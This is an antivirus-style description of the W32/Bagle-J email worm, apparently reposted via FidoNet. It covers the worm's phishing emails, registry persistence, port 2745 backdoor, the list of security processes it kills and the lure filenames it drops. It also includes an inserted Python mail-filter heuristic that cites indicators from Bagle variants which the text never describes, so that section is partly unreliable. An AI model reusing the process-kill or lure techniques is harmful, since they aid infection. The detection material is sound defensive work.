W32/Bagle-J is an email worm which sends itself via its own SMTP engine
to addresses harvested from your hard disk. The worm searches for files
with the extensions WAB, TXT, MSG, HTM, XML, DBX, MDX, EML, NCH, MMF,
ODS, CFG, ASP, PHP, PL, ADB, TBB, SHT, UIN and CGI.
The worm copies itself to the Windows system folder as IRUN4.EXE and
creates the file IRUN4.EXEOPEN (a copy of the worm in a password
protected ZIP format) in the same folder.
W32/Bagle-J adds the value:
ssate.exe = \irun4.exe
to the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
This means that W32/Bagle-J runs every time you log on to your computer.
Emails have the following characteristics:
Subject lines:
E-mail account security warning.
Notify about using the e-mail account.
Warning about your e-mail account.
Important notify about your e-mail account.
Email account utilization warning.
Notify about your e-mail account utilization.
E-mail account disabling warning.
Message texts (constructed from a choice of the following):
"Dear user of ,"
"Dear user of gateway e-mail server,"
"Dear user of e-mail server "<domain name>","
"Hello user of e-mail server,"
"Dear user of "" mailing system,"
"Dear user, the management of mailing system wants to let
you know that,"
and
"Your e-mail account has been temporary disabled because of unauthorized
access."
"Our main mailing server will be temporary unavaible for next two days,
to continue receiving mail in these days you have to configure our free
auto-forwarding service."
"Your e-mail account will be disabled because of improper using in next
three days, if you are still wishing to use it, please, resign your
account information."
"We warn you about some attacks on your e-mail account. Your computer may
contain viruses, in order to keep your computer and e-mail account safe,
please, follow the instructions."
"Our antivirus software has detected a large ammount of viruses outgoing
from your email account, you may use our free anti-virus tool to clean up
your computer software."
"Some of our clients complained about the spam (negative e-mail content)
outgoing from your e-mail account. Probably, you have been infected by
a proxy-relay trojan server. In order to keep your computer safe,
follow the instructions."
and
"For more information see the attached file."
"Further details can be obtained from attached file."
"Advanced details can be found in attached file."
"For details see the attach."
"For details see the attached file."
"For further details see the attach."
"Please, read the attach for further details."
"Pay attention on attached file."
and
"For security reasons attached file is password protected. The password
is ""."
"For security purposes the attached file is password protected. Password
is ""."
"Attached file protected with the password for security reasons.
Password is ."
"In order to read the attach you have to use the following password:
."
and
"Sincerely,"
"Best wishes,"
"Have a good day,"
"Cheers,"
"Kind regards,"
"The Management,"
and
"The team, http://www."
Attached file (a password protected ZIP archive):
Attach
Information
Readme
Document
TextDocument
TextFile
MoreInfo
Message
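The email characteristics listed above for W32/Bagle-O and W32/Bagle-J (fixed subject lines, a short set of attachment base names, an EXE/PIF program or a ZIP/RAR archive whose password is given in the body or in an attached image) are easy to turn into a mail-gateway heuristic. The Python below is an added example, not Sophos code; the indicator lists are transcribed from the description above (a subset, for brevity) and the sample messages are constructed.

```python
import re
# Indicators transcribed from the Bagle-N/O/J description above (subset, for brevity).
BAGLE_SUBJECTS = {s.lower() for s in (
    "E-mail account security warning.", "Warning about your e-mail account.",
    "Important notify about your e-mail account.", "E-mail account disabling warning.",
    "Re: Msg reply", "Re: Hello", "Re: Yahoo!", "Re: Thank you!", "Re: Thanks :)",
    "RE: Text message", "Re: Document", "Incoming message", "Re: Incoming Fax",
    "Hidden message", "Fax Message Received", "Protected message", "Forum notify",
    "Request response", "Site changes", "Re: Hi", "Encrypted document")}
BAGLE_ATTACH_NAMES = {"attach", "information", "details", "encrypted", "first_part",
                      "readme", "document", "info", "textdocument", "text",
                      "text_document", "pub_document", "moreinfo", "message"}
EXECUTABLE_EXTS, ARCHIVE_EXTS = {"exe", "pif"}, {"zip", "rar"}
IMAGE_EXTS = {"bmp", "gif", "jpg", "jpeg"}   # the password may arrive as an image
PASSWORD_RE = re.compile(r"\bpassword\b", re.I)

def classify_bagle_email(subject, attachments, body):
    """Score one message against the Bagle-O/J template; returns (score, reasons)."""
    reasons = []
    if subject.strip().lower() in BAGLE_SUBJECTS:
        reasons.append("known Bagle subject line")
    stems, exts = set(), set()
    for name in attachments:
        stem, dot, ext = name.lower().rpartition(".")
        stems.add(stem if dot else name.lower())
        exts.add(ext if dot else "")
    if stems & BAGLE_ATTACH_NAMES:
        reasons.append("known Bagle attachment name")
    if exts & EXECUTABLE_EXTS:
        reasons.append("executable attachment (.exe/.pif)")
    if exts & ARCHIVE_EXTS:  # .zip/.rar: the worm supplies the password itself
        if PASSWORD_RE.search(body):
            reasons.append("archive with password given in message body")
        elif exts & IMAGE_EXTS:
            reasons.append("archive plus image attachment (password-in-image variant)")
    if re.search(r"white rabbit|wabbit", body, re.I):
        reasons.append("'white rabbit' phrase from the Bagle message template")
    return len(reasons), reasons

SAMPLES = [  # constructed sample messages, not real captures
    ("E-mail account security warning.", ["Details.zip"],
     "Dear user of example.org mailing system,\nYour e-mail account has been "
     "temporary disabled.\nFor details see the attach.\nArchive password: 38421\n"),
    ("Re: Hi", ["Message.pif"], "Follow the wabbit."),
    ("Q3 budget", ["budget.xlsx"], "Attached is the spreadsheet we discussed."),
]

if __name__ == "__main__":
    for subject, atts, body in SAMPLES:
        score, why = classify_bagle_email(subject, atts, body)
        print(score, repr(subject), "; ".join(why) or "no Bagle indicators")
```

A score of 3 or more means subject, attachment name and delivery method all match the template; a lone hit on the attachment-name list is weak on its own, since names like "Document" are common in legitimate mail.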
W32/Bagle-J opens up a backdoor on port 2745 and listens for connections.
If it receives the appropriate command it attempts to download and
execute a file. W32/Bagle-J also makes a web connection to a remote URL,
thus reporting the location and open port of infected computers.
W32/Bagle-J attempts to terminate several anti-virus and
security-related processes:
ATUPDATER.EXE
AVWUPD32.EXE
AVPUPD.EXE
LUALL.EXE
DRWEBUPW.EXE
ICSSUPPNT.EXE
ICSUPP95.EXE
UPDATE.EXE
NUPGRADE.EXE
ATUPDATER.EXE
AUPDATE.EXE
AUTODOWN.EXE
AUTOTRACE.EXE
AUTOUPDATE.EXE
AVXQUAR.EXE
CFIAUDIT.EXE
MCUPDATE.EXE
NUPGRADE.EXE
OUTPOST.EXE
AVLTMAIN.EXE
W32/Bagle-J searches the mapped drives for folders containing the string
"shar" in the folder name. If such a folder is found, the worm copies
itself to the folder using the following filenames:
Microsoft Office 2003 Crack, Working!.exe
Microsoft Office XP working Crack, Keygen.exe
Microsoft Windows XP, WinXP Crack, working Keygen.exe
Porno Screensaver.scr
Porno, sex, oral, anal cool, awesome!!.exe
Porno pics arhive, xxx.exe
Serials.txt.exe
Windown Longhorn Beta Leak.exe
Windows Sourcecode update.doc.exe
XXX hardcore images.exe
Opera 8 New!.exe
WinAmp 5 Pro Keygen Crack Update.exe
WinAmp 6 New!.exe
Matrix 3 Revolution English Subtitles.exe
Adobe Photoshop 9 full.exe
Ahead Nero 7.exe
ACDSee 9.exe
If the date is after 25 April 2005, W32/Bagle-J terminates itself and
deletes all the registry entries it created when it first ran.
Hidden inside the Bagle-J worm's code is the following text, which is
never displayed:
Hey,NetSky, fuck off you bitch, don't ruine our bussiness, wanna start a
war?
--- MultiMail/Win32 v0.43
* Origin: Try Our Web Based QWK: DOCSPLACE.ORG (1:123/140)
SOURCE: echomail via fidonet.ozzmosis.com